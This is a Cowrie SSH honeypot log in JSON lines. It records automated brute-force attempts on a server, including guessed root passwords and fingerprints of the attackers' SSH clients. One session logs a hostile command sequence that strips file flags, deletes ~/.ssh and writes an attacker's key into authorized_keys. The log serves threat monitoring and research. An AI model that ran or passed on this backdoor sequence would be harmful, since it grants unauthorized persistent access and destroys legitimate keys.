{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51724,"dst_ip":"1.2.3.4","dst_port":22,"session":"24ce2447b72e","protocol":"ssh","message":"New connection: 212.227.235.229:51724 (1.2.3.4:22) [session: 24ce2447b72e]","sensor":"my-vps","timestamp":"2025-09-09T03:50:27.083431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:50:27.084522Z","src_ip":"212.227.235.229","session":"24ce2447b72e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:50:27.310962Z","src_ip":"212.227.235.229","session":"24ce2447b72e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:50:28.260450Z","src_ip":"212.227.235.229","session":"24ce2447b72e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:29.489317Z","src_ip":"212.227.235.229","session":"24ce2447b72e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51736,"dst_ip":"1.2.3.4","dst_port":22,"session":"289b7b758c16","protocol":"ssh","message":"New connection: 212.227.235.229:51736 (1.2.3.4:22) [session: 289b7b758c16]","sensor":"my-vps","timestamp":"2025-09-09T03:50:29.719590Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:50:29.720255Z","src_ip":"212.227.235.229","session":"289b7b758c16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:50:29.950370Z","src_ip":"212.227.235.229","session":"289b7b758c16"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:50:30.912534Z","src_ip":"212.227.235.229","session":"289b7b758c16"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:31.142806Z","src_ip":"212.227.235.229","session":"13ee4c037833"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:31.144267Z","src_ip":"212.227.235.229","session":"289b7b758c16"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":57834,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1b2bae7f90b","protocol":"ssh","message":"New connection: 51.81.118.153:57834 (1.2.3.4:22) [session: e1b2bae7f90b]","sensor":"my-vps","timestamp":"2025-09-09T03:50:34.572086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:50:34.573072Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:50:34.669089Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.login.success","username":"root","password":"password01","message":"login attempt [root/password01] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.097658Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:50:35.356981Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.357803Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.359109Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.458150Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T03:50:35.668763Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.669549Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.767581Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.768644Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":57840,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4501f10b7d6","protocol":"ssh","message":"New connection: 51.81.118.153:57840 (1.2.3.4:22) [session: f4501f10b7d6]","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.862399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.863342Z","src_ip":"51.81.118.153","session":"f4501f10b7d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:50:35.958858Z","src_ip":"51.81.118.153","session":"f4501f10b7d6"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T03:50:36.386133Z","src_ip":"51.81.118.153","session":"f4501f10b7d6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:37.483784Z","src_ip":"51.81.118.153","session":"f4501f10b7d6"}
{"eventid":"cowrie.session.connect","src_ip":"51.81.118.153","src_port":57852,"dst_ip":"1.2.3.4","dst_port":22,"session":"83ab6bd7a2a2","protocol":"ssh","message":"New connection: 51.81.118.153:57852 (1.2.3.4:22) [session: 83ab6bd7a2a2]","sensor":"my-vps","timestamp":"2025-09-09T03:50:37.576694Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:50:37.577741Z","src_ip":"51.81.118.153","session":"83ab6bd7a2a2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:50:37.672033Z","src_ip":"51.81.118.153","session":"83ab6bd7a2a2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T03:50:38.089688Z","src_ip":"51.81.118.153","session":"83ab6bd7a2a2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:38.185093Z","src_ip":"51.81.118.153","session":"83ab6bd7a2a2"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:38.186023Z","src_ip":"51.81.118.153","session":"e1b2bae7f90b"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":58374,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c39f77f45a5","protocol":"ssh","message":"New connection: 139.19.117.131:58374 (1.2.3.4:22) [session: 9c39f77f45a5]","sensor":"my-vps","timestamp":"2025-09-09T03:50:48.924681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T03:50:48.925534Z","src_ip":"139.19.117.131","session":"9c39f77f45a5"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-09T03:50:48.943162Z","src_ip":"139.19.117.131","session":"9c39f77f45a5"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","sensor":"my-vps","timestamp":"2025-09-09T03:50:48.980267Z","src_ip":"139.19.117.131","session":"9c39f77f45a5"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T03:50:48.980809Z","src_ip":"139.19.117.131","session":"9c39f77f45a5"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint 83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","sensor":"my-vps","timestamp":"2025-09-09T03:50:48.999167Z","src_ip":"139.19.117.131","session":"9c39f77f45a5"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"83:7a:04:22:5d:76:74:7a:a8:76:76:91:19:bb:73:16","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCBBNG9ZWFubdzlVhtetnJwslvXGX4+/xBYiTwufkD05brVannOmn7WnRoh6jq/TIZdo1kC7732/AoUMA98dtHeQ6YflAFbuD7JdgNy1SFeqTHJCBXc2ejFAa+uamDJsNHUKpke9QHUgBW0piXp1ChhXu94rRTJ2wGzBM0uy9C0FhU4pjMAzsb+C1XI8V/H6SID9bsVgymPCto85giCXNjSj4LaZXpAVHRXOmenDODjLPhL6b9IdEsFigDYtthaqNyk+w9WrMfN4sjNHq7y9p60attSSVisAU58zJ2fsZotiVPByik7IXyLRqzd27IAlCLgUq6I+hLkQfqYr5/khVv3","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-09T03:50:48.999729Z","src_ip":"139.19.117.131","session":"9c39f77f45a5"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:50:58.924793Z","src_ip":"139.19.117.131","session":"9c39f77f45a5"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":38246,"dst_ip":"1.2.3.4","dst_port":22,"session":"679775c5c779","protocol":"ssh","message":"New connection: 152.32.190.168:38246 (1.2.3.4:22) [session: 679775c5c779]","sensor":"my-vps","timestamp":"2025-09-09T03:51:00.217747Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T03:51:00.218570Z","src_ip":"152.32.190.168","session":"679775c5c779"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T03:51:00.474423Z","src_ip":"152.32.190.168","session":"679775c5c779"}
{"eventid":"cowrie.login.failed","username":"dev","password":"2025","message":"login attempt [dev/2025] failed","sensor":"my-vps","timestamp":"2025-09-09T03:51:01.538625Z","src_ip":"152.32.190.168","session":"679775c5c779"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T03:51:02.796510Z","src_ip":"152.32.190.168","session":"679775c5c779"}
